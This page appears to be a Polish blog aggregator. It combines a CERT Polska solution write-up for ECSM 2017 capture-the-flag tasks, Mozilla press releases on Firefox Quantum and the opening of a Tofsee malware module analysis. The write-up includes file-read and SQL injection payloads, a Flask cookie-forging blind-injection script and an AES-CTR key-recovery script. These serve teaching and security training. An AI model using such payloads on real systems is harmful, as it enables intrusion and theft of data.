Zadanie miało na celu przybliżyć proces analizowania wyjątkowo „złośliwego” skryptu. Bardzo często w przypadku wszelkiego rodzaju crack-me opartych na językach skryptowych, do rozwiązania wystarczy doprowadzenie skryptu do czytelnej postaci. W tym wypadku – problemem staje się sam język.

Podwójne uwierzytelnianie

Odnośniki na stronie z zadaniem mają postać adresu /index.php/instructions. Próbując odwiedzić nieistniejącą stronę, np. /index.php/abc aplikacja zwraca nam następujący błąd:

Warning: include(abc.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 30
Warning: include(): Failed opening 'abc.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 30

Błąd dołączenia pliku abc.php może nam sugerować, że aplikacja wykonuje kod zbliżony do include($parametr . '.php'). Możemy w takim razie spróbować użyć wrappera php:// jako protokołu w adresie, a konkretnie filtru convert.base64-decode do odczytania kodu źródłowego z plików aplikacji.

I faktycznie po odwiedzeniu adresu: /index.php/php://filter/read=convert.base64-encode/resource=index dostajemy zawartość index.php:
PD9waHAKb2Jfc3RhcnQoKTsKZGVmaW5lK...

Ze wszystkich dostępnych plików zdecydowanie najciekawszym jest instructions.php:

<?php if(!defined('APP')) { die('직접 접근 금지'); }

$ip = $_SERVER['HTTP_CLIENT_IP'] ?: ($_SERVER['HTTP_X_FORWARDED_FOR'] ?: $_SERVER['REMOTE_ADDR']);

function ip_in_range($ip, $min, $max) {
    return (ip2long($min) <= ip2long($ip) && ip2long($ip) <= ip2long($max));
}

if(ip_in_range($ip, '175.45.176.0', '175.45.179.255') ||
   ip_in_range($ip, '210.52.109.0', '210.52.109.255') ||
   ip_in_range($ip, '77.94.35.0', '77.94.35.255')) {
   
    if (!isset($_SERVER['PHP_AUTH_USER'])) {
        header('HTTP/1.0 401 Unauthorized');
        header('WWW-Authenticate: Basic realm="LOGIN"');
    } else {
        $login = $_SERVER['PHP_AUTH_USER'];
        $password = $_SERVER['PHP_AUTH_PW'];
       
        $db = new PDO('sqlite:database.sqlite3');

        $result = $db->query("select login, password from users where login = '$login'");
        if (!$result) { die($db->errorInfo()[2]); }
        $data = $result->fetchAll();

        if(count($data) == 0) {
            header('HTTP/1.0 401 Unauthorized');
            header('WWW-Authenticate: Basic realm="NO USER"');
        } elseif (md5($password) !== $data[0]['password']) {
            header('HTTP/1.0 401 Unauthorized');
            header('WWW-Authenticate: Basic realm="WRONG PASSWORD"');
        } else {
            print '<h2>안녕하십니까</h2>';

            $result = $db->query("select message from instructions where login = '{$data[0]['login']}'");
            if (!$result) { die($db->errorInfo()[2]); }
            $data = $result->fetchAll();

            if(count($data) == 0) {
                print('<h3>메시지 없음</h3>');
            } else {
                print '<h3>여기에 당신을위한 메시지가 있습니다.:</h3>';

                foreach($data as $row) {
                    print "<p>- {$row['message']}</p>";
                }
            }
        }
    }
} else {
    ?>
        <p>귀하의 지적 재산권은 영광 된 북한에 속해 있지 않습니다. VPN을 사용하면 사용자 이름과 비밀번호로 로그인 할 수 있습니다.</p>
    <?php
}

?>

Treść zadania sugerowała nam, że mamy odzyskać wiadomość użytkownika, którego nazwy nie znamy. Musimy po drodze przejść kilka warunków:

Pierwszy z nich to ograniczenie na adres IP.

Jednak po poniższym kodzie widzimy, że możemy oszukać aplikację podając sfabrykowaną wartość w nagłówku X-Forwarded-For – serwer powinien dodatkowo weryfikować czy jest to informacja z zaufanego serwera proxy.

$ip = $_SERVER['HTTP_CLIENT_IP'] ?: ($_SERVER['HTTP_X_FORWARDED_FOR'] ?: $_SERVER['REMOTE_ADDR']);

Następnym błędem w aplikacji to przekazanie parametrów do zapytań SQL powodujący możliwość wykonania SQL injection. Parametr, w którym możemy umieścić nasz payload to nazwa użytkownika podana w mechaniźmie HTTP Basic Auth.

$result = $db->query("select login, password from users where login = '$login'");
$data = $result->fetchAll();
$result = $db->query("select message from instructions where login = '{$data[0]['login']}'");

Możemy dzięki temu zadanie rozwiązać na kilka sposobów.

Pierwszy z nich to wybranie nieznanej nam nazwy użytkownika już w pierwszym zapytaniu:

username = "' union select (select login from users limit 1 offset 1), '098f6bcd4621d373cade4e832627b4f6' --"
password = 'test'

Musimy również podać „prawidłowe” hasło – a raczej zwrócić z zapytania hash md5 zgodny z hasłem podanym w HTTP Basic Auth.

Modyfikując offset w powyższym zapytaniu możemy pobrać wiadomości dowolnego użytkownika. W naszym przypadku był to drugi użytkownik.

Kolejna metoda to zwrócenie kolejnego SQL injection jako login, który będzie użyty w drugim zapytaniu:

username = "' union select "\'or 1=1 --", '098f6bcd4621d373cade4e832627b4f6' --"
password = '
test'

Można było też odzyskać login naszego użytkownika za pomocą blind SQL Injection.

Odzyskana flaga to ecsm{cyber.szpiegostwo}.

Memo Service

W pliku robots.txt możemy znaleźć informację o dwóch interesujących plikach: server.py oraz server.pyc.

O ile pierwszego z nich nie jesteśmy w stanie pobrać, to drugi zwraca nam skompilowany bytecode aplikacji w języku Python.

Po zdekompilowaniu narzędziem uncompyle6 otrzymujemy następujący kod źródłowy:

# uncompyle6 version 2.12.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.13 (default, Jan 19 2017, 14:48:08)
# [GCC 6.3.0 20170118]
# Embedded file name: /opt/memo/server.py
# Compiled at: 2017-10-30 14:42:54
from flask import Flask, session, render_template, request, redirect
from uuid import uuid4
from setup_server import cursor
app = Flask(__name__)
app.secret_key = 'lz2fhklkScDccJbseN3E'

@app.route('/')
def index():
    session['id'] = session.get('id', str(uuid4()))
    cursor.execute("select count(*) from users where user_id='%s'" % session['id'])
    new_user = int(cursor.fetchone()[0]) == 0
    cursor.execute('select memo from memos where user_id=?', [session['id']])
    memos = [ x[0] for x in cursor.fetchall() ]
    return render_template('index.html', memos=memos, new_user=new_user)


@app.route('/save', methods=['POST'])
def save_memo():
    session['id'] = session.get('id', str(uuid4()))
    cursor.execute('insert into memos values (?, ?)', (request.form.get('memo'), session['id']))
    return redirect('/', code=302)


@app.route('/accept_cookies', methods=['POST'])
def accept_cookies():
    cursor.execute('insert into users values (?)', [session['id']])
    return redirect('/', code=302)
# okay decompiling server.pyc

Z powyższego kodu można wyciągnąć dwie ważne informacje:

Jeśli zbadamy działanie aplikacji to zauważymy, że argument new_user odpowiada za wyświetlanie informacji o ciasteczkach dla nowych użytkowników.

Jeśli połączymy wszystkie zebrane wiadomości to już jesteśmy rozwiązać zadanie:

Cały atak można zapisać w formie prostego skryptu w języku Python:

from flask import Flask, session
from flask.sessions import SecureCookieSessionInterface

app = Flask("example")
app.secret_key = "lz2fhklkScDccJbseN3E"
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

import sys
import requests

url = "http://localhost:5000/"

def query(payload):
    session = {'id':payload}
    r = requests.get(url=url, cookies={'session':session_serializer.dumps(session)})
    if(r.text.find("display: none") == -1):
        return 0
    else:
        return 1

def queryLetter(payload):
    b = ""
    for i in range(8):
        b += str(query(payload.format(str(i))))
    print(b[::-1])
    return (int(b[::-1], 2))

out = ""
for i in range(1, 100):
    # Znalezienie tabeli/kolumny
    # letter = queryLetter("a' or (unicode(SUBSTR((SELECT name FROM sqlite_master WHERE type='table' limit 1 offset 2),"+str(i)+", 1)) >> {} & 1);--")

    letter = queryLetter("a' or (unicode(SUBSTR((SELECT * FROM this_doesnt_look_like_a_table_with_flag),"+str(i)+", 1)) >> {} & 1);--")

    if not letter:
        break

    out += chr(letter)

print(out)

Przepełnienie Stosu

Zadanie

W założeniu było to proste zadanie – być może nawet najprostsze zadanie na ECSM2017.

Dostajemy zaszyfrowany plik oraz informację, że został zaszyfrowany kodem znajdującym się pod adresem: https://github.com/WillyWu0201/CryptorRandomFile/blob/master/PyCrypto_AES_256_CTR.py.

Jako twórcy zadania ryzykowaliśmy trochę linkując do źródła którego nie kontrolowaliśmy. Na szczęście właściciel nie zdecydował się złośliwie podmienić go podczas konkursu, ale na wszelki wypadek na przyszłośc kopiujemy je poniżej:

# -*- coding: utf-8 -*-

from __future__ import absolute_import, division, unicode_literals

import os
from Crypto.Cipher import AES

_IV = os.urandom(16) # 產生隨機亂數IV
_KEY = os.urandom(32) # 設定Key
_COUNTER = os.urandom(16)
_BlockSize = AES.block_size # Block Size

#padding
_Pad = lambda s: s + (_BlockSize - len(s) % _BlockSize) * chr(_BlockSize - len(s) % _BlockSize)
_Unpad = lambda s : s[0:-ord(s[-1])]

# 使用CTR加密
def aes_encrypt(data):
    cryptor = AES.new(_KEY, AES.MODE_CTR, counter=lambda: _COUNTER)
    return cryptor.encrypt(_Pad(data))

# 使用CTR解密
def aes_decrypt(data):
    cryptor = AES.new(_KEY, AES.MODE_CTR, counter=lambda: _COUNTER)
    return _Unpad(cryptor.decrypt(data))

# encrypt = aes_encrypt('encrypt this CTR 123123213122131213')
# print (encrypt)
# decrypt = aes_decrypt(encrypt)
# print (decrypt)

Analiza

Jak widać, mamy tu funkcje służące do szyfrowania i deszyfrowania AES-em.

AES jest mocnym algorytmem szyfrowania, a tryb CTR jest równie dobry (albo lepszy) niż stary dobry CBC.

W dodatku stałe są losowane w bezpieczny sposób, więc ataki na słabą losowośc odpadają:

_IV = os.urandom(16) # 產生隨機亂數IV
_KEY = os.urandom(32) # 設定Key
_COUNTER = os.urandom(16)

Na pierwszy rzut oka może więc wydawać się że zadanie jest nierozwiązywalne albo dramatycznie trudne – nie jest jednak tak źle!

Ponieważ jeśli ktoś jest zaznajomiony (albo przekartkuje artykuł na Wikipedii) z trybem CTR, prawdopodobnie od razu wyda mu się podejrzany fragment:

# 使用CTR加密
def aes_encrypt(data):
    cryptor = AES.new(_KEY, AES.MODE_CTR, counter=lambda: _COUNTER)
    return cryptor.encrypt(_Pad(data))

counter to dziwny element API PyCrypto – ten parametr to funkcja która powinna zwracać za każdym razem kolejną wartość licznika (po szczegóły trybu CTR odsyłamy do Wikipedii). Ważne jest to, żeby nigdy nie powtarzała się wartośc zwracana przez tą funkcję dla jednego klucza. A tymczasem w tym przykładzie funkcja counter zwraca zawsze tę samą wartość (16 bajtów wylosowane na początku programu)! Jest to ważne, bo, jak wynika z działania metory CTR:

Jeśli licznik powtórzy się chociaż raz, to całe szyfrowanie sprowadza się do przeprowadzenia operacji xor.

Atak

Pozostaje pytanie, jak złamać takie szyfrowanie z operacją xor.

Wiemy (albo raczej – możemy się domyśleć z rozszerzenia) że zaszyfrowany został plik pdf. Pliki pdf mają dość charaketerystyczny nagłówek. Konkretnie, stałe jest:

%PDF-<numer-wersji>
%

Czyli na przykład:

%PDF-1.4
%

(Zamiast 4 zdarzają się inne pomniejsze wersje – w zadaniu była wersja 1.4 co można było np. zgadnąć, albo poprawić później)

Czyli szesnastkowo: 25 50 44 46 2d 31 2e 34 0a 25.

Jako że cały ciphertext jest wynikiem operacji xor z 16bajtowym kluczem, nazwijmy:

Wiemy więc że pt0 ^ klucz = ct0.

Co więcej, generalizuje się to dalej, np:

itd.

Gdybyśmy mieli cały klucz, moglibyśmy banalnie odzyskać cały plaintext przekształcając te równania:

pt0 = ct0 ^ klucz
pt1 = ct1 ^ klucz

Niestety nie mamy całego klucza, ale możemy odzyskać jego początek! Bo dalej przekształacając równanie:

pt0 ^ ct0 = klucz

Więc jeśli znamy pierwsze X bajtów ciphertextu i plaintextu (a znamy), to znamy też pierwsze bajty klucza.

Można w ten sposób odzyskać klucz i spróbować coś zdeszyfrować – spróbujmy napisać kod:

# -*- coding: utf-8 -*-

import sys

def blocks(data, n):
    """ split data to n-byte chunks """
    return [data[i*n:(i+1)*n] for i in range(len(data)/n)]

def safe(string):
    """ replace non-printable characters with dot '.' """
    return ''.join(c if 32 <= ord(c) < 0x7f else '.' for c in string)

def xor(a, b):
    """ xor 'a' and 'b' messages with each other """
    return ''.join(chr(ord(ac) ^ ord(bc)) for ac, bc in zip(a, b))

def main():
    data = open(sys.argv[1], 'rb').read()
    prefix = "255044462d312e340a25".decode('hex')
    prefix = prefix + '\x00' * (16 - len(prefix))  # pad prefix to 16 bytes
    chunks = blocks(data, 16)

    key = xor(chunks[0], prefix)

    for chunk in chunks[:10]: # decrypt first 10 chunks
         print safe(xor(chunk, key))


if __name__ == '__main__':
    main()

I sprawdźmy wynik:

╰─$ python decrypt.py output.pdf.enc
%PDF-1.4.%......
 0 obj.<</....~^
r (Mozilla....*m
(X11; Linu....<n
64\) Apple....cE
/537.36 \(....F.
 like Geck....IY
rome/61.0.....$.
00 Safari/....9.
)./Produce....aX

Doskonale, pierwsze bajty faktycznie zostały poprawnie zdeszyfrowane! Niestety, dalej jest ciężko. Ale możemy tę linię rozumowania pociągnąć dalej. Np. w bloku (X11; Linu....<n dość łatwo się domyślić że kolejnym znakiem będzie x z Linux, a w like Geck....IY kolejnym znakiem będzie o jak Gecko – a po nich pewnie spacja. Z tego możemy wyliczyć kolejne bajty klucza i ponownie uruchomić algorytm:

%PDF-1.4.%......
 0 obj.<</Cr..~^
r (Mozilla/5..*m
(X11; Linux ..<n
64\) AppleWe..cE
/537.36 \(KH..F.
 like Gecko\..IY
rome/61.0.31..$.
00 Safari/53..9.
)./Producer ..aX

Ty, razem na przykład rzuca się w oczy 64\) AppleWe..cE który może być tylko AppleWebKitem. To już wystarczy do odzyskania pełnego klucza, i pełnego pliku pdf.

Artykuł Rozwiązania zadań z konkursu Capture The Flag w ramach ECSM 2017 pochodzi z serwisu CERT Polska.

Mateusz Szymaniec, 28 listopada 2017, 11:54

20 listopada 2017

Centrum prasowe Mozilli

Prywatne przeglądanie w Firefoksie czy tryb Incognito w Chrome: który jest szybszy?

Wraz z premierą przeglądarki Firefox Quantum postanowiliśmy połączyć siły z Disconnect Inc., aby porównać czas ładowania strony w trybie incognito przeglądarki Chrome i prywatnego przeglądania w Firefox Quantum.


Firefox Quantum to najszybsza wersja Firefoksa jaką do tej pory stworzyliśmy. Jest dwa razy szybsza od Firefoksa 52 i wielu przypadkach szybsza od najnowszej wersji przeglądarki Chrome – porównaliśmy ich działanie na kilku stronach. Dzięki przeprowadzeniu testów wydajności mogliśmy wyeliminować niepotrzebne opóźnienia i zapewnić naszym użytkownikom jak najlepsze doświadczenia.

Większość testów porównujących wydajność przeglądarek skupia się na korzystaniu ze zwykłego trybu przeglądania. Ale co z przeglądaniem prywatnym? Biorąc pod uwagę fakt, że korzystanie z tej funkcji jest powszechne, chcieliśmy sprawdzić, jak wypada przeglądanie prywatne w Firefoksie w porównaniu z trybem incognito w Chrome pod względem czasu wczytywania strony (czas między kliknięciem a wyświetleniem strony na ekranie).

Uwaga spoiler… Prywatne przeglądanie w Firefox Quantum jest szybkie… naprawdę szybkie

Dlaczego wydajność prywatnego przeglądania może się różnić?

Strony internetowe mają możliwość ładowania treści i uruchamiania skryptów z różnych źródeł. Niektóre z tych skryptów obejmują moduły śledzenia. Są one używane z wielu powodów, od analityki internetowej do śledzenia zaangażowania na stronie w celu ukierunkowanej reklamy. Korzystanie z trackerów na stronach internetowych jest bardzo powszechne. Niestety moduły śledzące mogą opóźnić proces ładowania strony, ponieważ przeglądarka czeka na odpowiedź skryptów śledzenia.

W 2015 roku Firefox stał się jedyną przeglądarką, która domyślnie włączyła Ochronę przed śledzeniem w trybie prywatnego przeglądania. Ochrona przed śledzeniem, jak sama nazwa wskazuje, blokuje ładowanie zasobów, jeśli otwierany adres URL znajduje się na liście znanych modułów śledzących, zgodnie z listą Tracking Protection stworzoną przez Disconnect. Lista ta jest zrównoważonym podejściem do blokowania i nie obejmuje witryn przestrzegających polityki Do Not Track (zgodnie z wytycznymi EFF). Ta funkcja ma na celu zapobieganie śledzenia użytkowników, którzy wyraźnie zdecydowali się na korzystanie z prywatnego przeglądania. W efekcie jednak witryny, które próbują załadować zawartość z adresów URL na liście śledzenia, ładują się znacznie szybciej. Poprzednie badanie Firefoksa z 2015 roku wykazało, że średni czas wczytywania stron był skrócony na stronach z aktualnościami o 44%.

Ponieważ Firefox Quantum jest najszybszą wersją Firefoksa do tej pory, pomyśleliśmy, że porównamy czasy ładowania strony w trybie prywatnym w Firefox Quantum (które obejmuje funkcję Tracking Protection) z trybem Incognito przeglądarki Chrome, który nie obejmuje funkcji ochrony przed śledzeniem.

Metodologia Pomiary zostały wykonane przez Disconnect, organizację odpowiedzialną za listy domen używanych do zasilania funkcji Tracking Protection. Czas ładowania strony dla 200 najpopularniejszych witryn z wiadomościami według rankingu Alexa.com został zmierzony przy użyciu przeglądarki Firefox Quantum (wersja beta 57.0b10v57) w trybie domyślnym i trybie przeglądania prywatnego oraz w najnowszej wersji Chrome (v61.0.3163.100) dostępnej w czasie wykonywania testów – także w trybach domyślnych i incognito. Do testów zostały wybrane strony z wiadomościami, ponieważ mają najwięcej trackerów.

Każda z witryn z wiadomościami została załadowana 10 razy. Aby test mógł mierzyć porównywalne czasy i mógł być powtórzony przez innych, czasy ładowania zostały zmierzone za pomocą interfejsu API PerformanceTiming zarówno dla przeglądarki Firefox, jak i Chrome dla każdego ładowania strony. Całkowity czas ładowania jest uważany za różnicę między PerformanceTiming.loadEventEnd i PerformanceTiming.navigationStart. Testy były kontrolowane za pomocą automatycznego skryptu.

Wszystkie rundy testowe zostały przeprowadzone na nowym Macbook Pro (13” Macbook Pro 2017, 3.1GHz i5, 16 GB pamięci, OSX 10.13). Testy wykonane zostały na szybkim połączeniu sieciowym z Macbookiem Pro połączonym z łączem internetowym 100 Mb / s przez WiFi (802.11ac, 867Mbit / s). Aby zapoznać się z metodologią, przeczytaj posta z bloga Mozilla Hacks.

WynikiPo przebadaniu 200 witryn z wiadomościami średni czas wczytywania strony w przeglądarce Firefox Quantum to 3,2 s w porównaniu z trybem incognito w przeglądarce Chrome, który trwał średnio 7,7 sekundy, aby wczytać stronę szybkiego połączenia Gigabit. Oznacza to, że przeglądanie prywatne Firefox Quantum ładuje stronę 2.4x szybciej niż Chrome w trybie incognito.

Porównanie średnich czasów ładowania w Chrome pokazuje również, że sam tryb incognito nie przynosi żadnych ulepszeń szybkości. To właśnie ochrona przed śledzeniem robi różnicę jak pokazują wyniki dla przeglądarki Firefox Quantum.

Innym sposobem odczytywania tych danych jest określenie czasu, który użytkownicy mogą zaakceptować na załadowanie stron. Niedawno przeprowadzone przez SOASTA Inc. badania wykazały, że średni czas ładowania sesji wynoszący 6 sekund daje już 70-procentowy współczynnik odrzuceń. Dlatego warto umieścić nasze pomiary w kontekście oglądania stron w przeglądarce, które trwały dłużej niż 6 sekund.

95% ładowanych stron osiągnęło 6-sekundowy lub szybszy próg przy użyciu prywatnego przeglądania w Firefox Quantum z włączoną ochroną przed śledzeniem, podczas gdy tylko 70% stron ładowało się w Chrome, pozostawiając tym samym prawie jedną trzecią stron z wiadomościami, które się nie załadowały.

Co dalej?

O ile ulepszenia prędkości w Firefoksie Quantum będą się różnić w zależności od witryny, to użytkownicy mogą oczekiwać, że przeglądanie prywatne w przeglądarce Firefox będzie szybsze od trybu incognito w Chrome.

Dzięki tym badaniom, chcieliśmy, aby użytkownicy mogli czerpać korzyści ze zwiększonej prędkości i prywatności poza trybem przeglądania prywatnego. Dzięki przeglądarce Firefox Quantum użytkownicy mają teraz możliwość włączenia funkcji ochrony przed śledzeniem w Firefoksie w dowolnym momencie.

Zainteresowany? Wypróbuj prywatne przeglądanie!

Jeśli chciałbyś korzystać z fukncji Tracking Protection za każdym razem, kiedy korzystasz z Firefoksa, pobierz Firefox Quantum i otwórz „Preferencje”. Wybierz „Ochrona i Prywatność” i zjedź na dół, aż znajdziesz „Tracking Protection”. Wybierz opcję „Zawsze”, aby usprawnić szybkość i ochronę zawsze, kiedy będziesz korzystać z Firefox Quantum.

Pamiętaj, że uruchamiając Tracking Protection możesz zablokować narzędzia do lubienia i komentowania oraz niektóre treści wideo.

Jeśli Tracking Protection to funkcja, której wcześniej używałeś, lub którą chcesz używać regularnie, wypróbuj Firefox Quantum i sprawdź, jaka jest szybka!


Firma Disconnect Inc. i Mozilla nawiązały współpracę w 2015 r., aby opracować funkcję ochrony przed śledzeniem w Firefoksie, zapewniając kontrolę nad danymi, które są pozyskiwane przez niepowołane strony. Lista blokowanych witryn oparta jest na liście znanych modułów śledzących, zgodnie z definicją listy Disconnect’s Tracking Protection. Jako kolejny krok zadawaliśmy sobie pytanie, czy tryb przeglądania prywatnego Firefoksa z funkcją Tracking Protection może również zapewniać dodatkowe korzyści.

Contributors: Peter Dolanjski & Dominik Strohmeier – Mozilla, Casey Oppenheim & Eason Goodale – Disconnect Inc.

Centrum prasowe Mozilli, 20 listopada 2017, 14:47

14 listopada 2017

Centrum prasowe Mozilli

Google domyślną wyszukiwarką w Firefoksie w Stanach, Kanadzie, Hong Kongu i na Tajwanie

Dziś swoją premierę ma Firefox Quantum. Jest to najszybszy, jak do tej pory, Firefox z nowym interfejsem zbudowany na całkowicie zrestrukturyzowanym silniku. Ponieważ w Firefox Quantum skupiamy się na wrażeniach użytkowników i wydajności, Google będzie nową domyślną wyszukiwarką dla Stanów Zjednoczonych, Hong Kongu i na Tajwanie.

Inni dostawcy wyszukiwania to Yandex w Rosji, Turcji, na Białorusi i w Kazachstanie, Baidu w Chinach i Google w całej reszcie świata. Firefox daje więcej możliwości wyboru niż jakakolwiek inna przeglądarka, dzięki 60 wyszukiwarkom zainstalowanym w ponad 90 językach.

Jest to część naszej strategii wyszukiwania, ogłoszonej w 2014 roku, aby wybrać najlepszą wyszukiwarkę dla każdego regionu, w przeciwieństwie do jednej na całym świecie.

 

 

 

 

 

 

 

Przykładamy dużą wagę do tworzenia jak najlepszego doświadczenia dla użytkowników i kontynuujemy prace nad dostarczaniem użytkownikom lokalnych rozwiązań i promowaniem innowacji.

Jeśli nie wypróbowałeś jeszcze nowego Firefoksa, możesz to zrobić tutaj.

Centrum prasowe Mozilli, 14 listopada 2017, 14:56

Przedstawiamy nowego Firefoksa: Firefox Quantum

Szybki. Naprawdę szybki. Firefox Quantum jest ponad dwa razy szybszy od Firefoksa sprzed 6 miesięcy. Napędzany rdzeniowym silnikiem opartym na nowej technologii opracowanej przez naszą zaawansowaną grupę badawczą Firefox pozwoli Ci robić to, co umiesz najlepiej. Teraz możesz odwiedzać mnóstwo stron i bez obaw otwierać miliony kart, ponieważ Firefox Quantum zużywa mniej pamięci niż konkurencja. Twój komputer będzie Ci wdzięczny. 🙂

Jest to zdecydowanie największa aktualizacja, jaką mieliśmy od czasu uruchomienia Firefoksa 1.0 w 2004 roku – lepsza pod każdym względem. Instalując ją teraz, od razu zauważysz różnicę. Jeśli jesteś ciekawy, co zmieniliśmy, czytaj dalej.

Pierwszą rzeczą, którą zauważysz, jest szybkość. Otwórz kilka kart i baw się dobrze. Drugą rzeczą jest nowy interfejs użytkownika (UI). Tę inicjatywę nazwaliśmy Photon, a jej celem jest modernizacja i ujednolicenie wszystkiego, co jest związane z Firefoksem, przy użyciu nowego szybkiego silnika. Zgadłeś: interfejs użytkownika Photon jest niesamowicie szybki i płynny. Aby stworzyć projekt Photon nasz zespół zbadał, w jaki sposób użytkownicy korzystają z sieci. Przyjrzeliśmy się sprzętowi z całego świata, aby Firefox wyglądał świetnie na każdym ekranie i upewniliśmy się, że Firefox działa jak Firefox, niezależnie od używanego urządzenia. Nasi projektanci stworzyli system, który jest dopasowany nie tylko do obecnego sprzętu, ale pozwoli nam rozwijać się w przyszłości.

Wprowadziliśmy wiele usprawnień w zakresie wydajności w rdzeniu przeglądarki i dodaliśmy nowy silnik CSS, Stylo, który lepiej wykorzystuje dzisiejszy sprzęt z wieloma rdzeniami, zoptymalizowanymi pod kątem niskiego zużycia energii. Firefox został ulepszony tak, aby karta, na której jesteś była traktowana priorytetowo, lepiej wykorzystując cenne zasoby systemowe. Bazowaliśmy na zmianach, które zostały wprowadzone w czerwcu. Ale to jeszcze nie koniec. David Bryant, który pierwszy wspomniał o Projekcie Quantum, wyjaśnia, jakie mamy plany i co robimy, aby nadal poprawiać wydajność przeglądarki.

W ramach koncentrowania się na doświadczeniach użytkowników i wydajności w Firefoksie Quantum, Google stanie się naszą nową domyślną wyszukiwarką w Stanach Zjednoczonych i Kanadzie. Dzięki 60 wyszukiwarkom zainstalowanym w ponad 90 językach, Firefox oferuje większy wybór dostawców wyszukiwania niż jakakolwiek inna przeglądarka.

Wprowadzenie wszystkich tych zmian w Firefoksie to nie lada wyczyn. Pracownicy i wolontariusze z całego świata pracowali w rekordowym czasie, aby stworzyć najlepszego Firefoksa. Zobaczmy, co udało nam się osiągnąć w ubiegłym roku.

Nowy Firefox Quantum w liczbach:

(więcej ciekawostek na blogu Firefox Frontier)

Ilu autorów dodało kod?

Ilu wolontariuszy przyczyniło się do rozwoju kodu?

Na ile sposobów można dostosować pasek narzędzi w nowej przeglądarce Firefox?

Słyszeliśmy już kilka opinii o Firefox Quantum, kiedy był jeszcze w fazie beta, oto kilka z nich:

“[Firefox] flies.” — @DaveVoyles

“This is called mind blowing stuff.” — @sndp_007

“Flipping fast” — @cubicgarden

“It’s quite a leap” or “IT’S SO FAST” — @felixreiseberg

“Its speed is 😍😍” — @sayo_paul

Przetestuj nowego Firefoksa dla systemów Windows, Mac lub Linux. Nowy wygląd będzie też dostępny na iOS i Androidzie.

O pracy, jaką włożyliśmy w stworzenie Firefox Quantum oraz kolejnych zmianach, które będą wprowadzane, moglibyśmy jeszcze długo opowiadać. Ale teraz powinieneś przestać czytać i pobrać nowego Firefoksa. To z pewnością poprawi Ci humor!

Pobierz tu:  iOS  Android Desktop

Centrum prasowe Mozilli, 14 listopada 2017, 14:07

19 października 2017

CERT Polska

Głębsze spojrzenie na moduły Tofsee

logo

Tofsee jest złośliwym oprogramowaniem z wieloma funkcjami – może kopać bitcoiny, wysyłać emaile, kraść dane dostępowe, wykonywać ataki DDoS i wiele więcej.

Pisaliśmy już o Tofsee/Ghegu kilka miesięcy temu – nasza analiza znajduje się pod adresem https://www.cert.pl/news/single/tofsee. Znajomość tamtego posta jest potrzebna żeby w pełni zrozumieć obecnie omawiany temat. Ten post ma za zadanie tylko rozszerzyć tamte badania, koncentrując się na funkcjach wtyczek, których wcześniej nie opisaliśmy.

Podsumujemy pokrótce każdy moduł i podkreślimy jego najważniejsze możliwości.

Ten post jest raczej długi – dla niecierpliwych, lista hashy i spis treści w jednym:

ID Zasobu Nazwa DLL Hash pluginu
1 ddosR.dll fbc7eebe4a56114e55989e50d8d19b5b
2 antibot.dll a3ba755086b75e1b654532d1d097c549
3 snrpR.dll 385b09563350897f8c941b47fb199dcb
4 proxyR.dll 4a174e770958be3eb5cc2c4a164038af
5 webmR.dll 78ee41b097d402849474291214391d34
6 protect.dll 624c5469ba44c7eda33a293638260544
7 locsR.dll 2d28c116ca0783046732edf4d4079c77
10 hostR.dll c90224a3f8b0ab83fafbac6708b9f834
11 text.dll 48ace17c96ae8b30509efcb83a1218b4
12 smtp.dll 761e654fb2f47a39b69340c1de181ce0
13 blist.dll e77c0f921ef3ff1c4ef83ea6383b51b9
14 miner.dll 47405b40ef8603f24b0e4e2b59b74a8c
15 img.dll e0b0448dc095738ab8eaa89539b66e47
16 spread.dll 227ec327fe7544f04ce07023ebe816d5
17 spread2.dll 90a7f97c02d5f15801f7449cdf35cd2d
18 sys.dll 70dbbaba56a58775658d74cdddc56d05
19 webb.dll 8a3d2ae32b894624b090ff7a36da2db4
20 p2p.dll e0061dce024cca457457d217c9905358

1. ddosR.dll

Oryginalna nazwa pliku: p:\cmf5\small2\plugins\plg_ddos\ddos.cpp

Zadaniem tego pluginu jest wykonywanie ataków DDoS na wskazane cele. Zaimplementowane metody nie są zbyt skomplikowane, np. wykonywanie wielu zapytań (tzw. HTTP Flood):

Albo stary dobry SYN flood (używając sterownika PassThru, czyli modułu grabb).

Nie zaobserwowaliśmy jeszcze żadnej aktywności DDoS od Tofsee – prawdopodobnie ten plugin obecnie nie jest wykorzystywany przez botmastera.

Konfiguracja otrzymywana z C&C dla tego pluginu jest bardzo prosta:

Moduły zawierają wiele napisów, które znacznie upraszczają analizę:

2. antibot.dll

Oryginalna nazwa pliku: z:\cmf5\small2\plugins\plg_antibot\plugin.cpp

To bardzo interesujący plugin – jego celem jest usunięcie innych rodzajów złośliwego oprogramowania z komputera ofiary.

Jest w stanie:

Lista dodatków usuwanych aktualnie przez moduł (pobranych z C&C):

3. snrpR.dll

Oryginalna nazwa pliku: p:\\cmf5\\small2\\plugins\\plg_sniff\\sniff.cpp

Powiązana sekcja w konfiguracji:

Ruch jest podsłuchiwany i przechwytywany przez sterownik PassThru (dostępny przez named pipe „\\\\.\\PassThru”).

Przykładowy szablon który otrzymaliśmy (mimo że ta funkcja jest obecnie wyłączona):

Jak widać, szablon zostawia oryginalne nagłówki From, To (%FROM_LINE, %TO_LINE), dodatkowo ma opcję zostawienia oryginalnego tematu (%SUBJ, %_SUBJ) i oryginalnego czasu (%DATE, %P5DATE, %M5DATE)

4. proxyR.dll

Oryginalna nazwa pliku: p:\\cmf5\\small2\\plugins\\plg_proxy\\plugin.cpp

Ten moduł nasłuchuje na połączenia TCP na adresie 0.0.0.0:1080 i dostarcza wielowątkowy serwer SOCKS proxy. Wersja, którą analizowaliśmy, identyfikuje się w nagłówku Proxy-agent jako WinRoute Pro/4.1.

Ruch jest przekierowywany do adresów wpisanych w sekcji proxy_cfg, osobno dla każdego regionu:

Adresy są albo wpisane jako referencje do listy work_srv, albo bezpośrednio:

W proxy_cfg mamy też listę skonfigurowanych dla socketów timeoutów:

Kiedy brakuje jakiejś wartości w konfiguracji, program ma kilka domyślnych wartości zapewniających działanie.

Moduł dodatkowo dodaje mapowanie portu używając UPnP, przedstawiając się jako Skype:

Napisy z programu dają trochę wglądu w cel i wewnętrzne działanie tego pluginu:

6. protect.dll

Oryginalna nazwa pliku: z:\cmf5\small2\plugins\plg_protect\plugin.cpp

Ten moduł pobiera i instaluje złośliwą usługę w systemie:

